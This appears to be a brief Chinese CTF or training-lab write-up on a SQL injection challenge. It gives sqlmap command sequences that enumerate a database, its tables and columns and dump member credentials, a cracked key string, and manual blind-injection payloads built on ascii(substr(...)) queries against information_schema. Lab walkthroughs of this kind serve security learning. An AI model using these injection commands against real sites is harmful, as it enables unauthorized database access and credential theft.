题目分析
image.png
-
界面上的连接地址存在sql注入点
image.png
工具注入(sqlmap)。
-
sqlmap -u 注入点url --current-db 获取到的数据库名是stormgroup
image.png
-
sqlmap -u 注入点url -D 获取到的数据名 --tables 获取到的表是member和notice
image.png
-
sqlmap -u 注入点url -D 获取到的数据库名 -T 获取到的表名 --columns 获取到的列名分别是 name password status
image.png
-
sqlmap -u 注入点url -D 获取到的数据库名 -T 获取到的表名 -C 要获取值指定列 --dump 获取到的值如下图
image.png
-
md5 解密后
image.png
mozhe8658fb5536048e0fee6edab1cac
手工注入思路
- ascii(substr((select database()),1,1))判断出数据库的名字
- ascii(substr((select table_name from information_schema.tables where table_schema='获取到的数据库名字' limit 1,1),1,1)) 判断出表名
- ascii(substr((select column_name from information_schema.columns where table_name='获取到的表名' and table_schema='获取到的数据库名' limit 0,1),1,1)) 判断出列名
- and ascii(substr((select concat(name) from stormgroup.member limit 1,1),1,1))
网友评论